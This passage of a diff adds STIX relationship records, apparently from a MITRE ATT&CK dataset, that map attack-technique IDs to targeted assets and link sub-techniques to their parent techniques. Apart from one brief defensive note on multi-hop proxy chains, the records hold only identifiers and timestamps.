"x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7535c73e-980d-4955-aaf5-de6b78f5a534", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--753612b9-be69-403d-81c7-8fc2cb0e7de2", + "created": "2024-06-26T19:24:01.049Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:24:01.049Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--75416708-207a-47f1-a059-1f2022e61d16", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--754cc715-bc2a-427e-b380-9b1e2e5d2af3", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--757b6e7d-f7c2-43ce-97c1-36a9cffe8e6f", + "created": "2024-06-26T19:27:41.520Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:27:41.520Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--757be841-a218-4d0e-bbe3-a138eea7692e", + "created": "2020-10-01T02:08:34.018Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7584e57f-1258-4c47-b18d-99019a586e6c", + "created": "2023-09-28T21:16:35.382Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:16:35.382Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--758773e3-d23d-44db-b5d3-643cde5b41f1", + "created": "2023-09-28T19:45:07.511Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:45:07.511Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7589a8a9-20c3-4679-9c6a-85df4e58aa67", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--75adec4f-5439-4e7d-a9d6-7daef1e0e07e", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--75c27f4e-d1e3-490a-9793-a6fc8e326a48", + "created": "2023-09-29T17:06:33.098Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:06:33.098Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--75c55c11-e806-4289-bfc3-d79e22ef4bc1", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--75c58551-f02d-4f21-aecc-a5d6e5559d3c", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--75cbd6f6-2fcd-4d4e-aa53-e1e9618fc53b", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--75d5bf01-de6c-4fff-a285-095a5c04a20a", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--75e18d49-5991-4bcf-bd6b-fd548a2cc269", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--75e6adae-06a7-47e9-878e-74ca73004c3b", + "created": "2023-09-28T20:30:01.641Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:30:01.641Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--761c328c-c7fe-4968-875d-537b99c4a605", + "created": "2020-06-16T17:23:06.601Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4", + "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--76462db7-3fba-4782-9e4d-c1a189da41e4", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--76485f23-3630-430d-84b8-edff7c722c93", + "created": "2024-06-27T09:19:05.552Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:19:05.552Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--764a1a01-2f14-465e-9c5d-c7b3fadfca4a", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--765341cf-9b18-4d93-a8fa-a8197a397c98", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--76537fd7-5782-4a8d-9b54-117b168a4306", + "created": "2023-09-29T16:38:51.155Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:38:51.155Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7660063c-b778-46b9-a52d-74c9c5b21f45", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7699b867-b972-4d7a-abb5-3bb2923c18d0", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--769b2668-2e16-4300-89f4-f45124896fb8", + "created": "2020-03-27T21:02:29.469Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--769f45e3-d396-4df4-a7a8-ad70bd1c44cf", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--76d837ed-157b-44e0-a6bf-189ffc3239c3", + "created": "2020-03-15T15:37:47.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--76d9777e-b331-4823-aa63-931e4bc0bd79", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--76de1de1-d752-4a7b-9922-ca70701f8f36", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--76e3589a-357f-4ba3-90fb-6363f45381c2", + "created": "2024-05-23T04:09:21.962Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:40:34.027Z", + "description": "Asset Mapping Rationale: Adversaries may chain together multiple proxies to disguise the source of malicious traffic. In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain.", + "relationship_type": "targets", + "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--76f72238-ec00-4be4-bb21-e96f1cad7957", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--76fd5c9b-2158-4372-85b6-a6961b68aaed", + "created": "2020-03-21T00:43:01.580Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7723dabf-8c18-4af5-90ba-4b34fc760344", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--77243f9a-2df8-4ad1-bc68-567baff50e69", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--773a02db-7ad7-4be0-a794-4d5da148df7d", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--773d905f-5766-4f5c-b242-80126921211a", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--77510acd-c8de-4e42-a35c-e3202c24b6a0", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--77559f07-2f75-4eab-962f-3705b9ad704b", + "created": "2020-10-01T01:01:00.257Z", 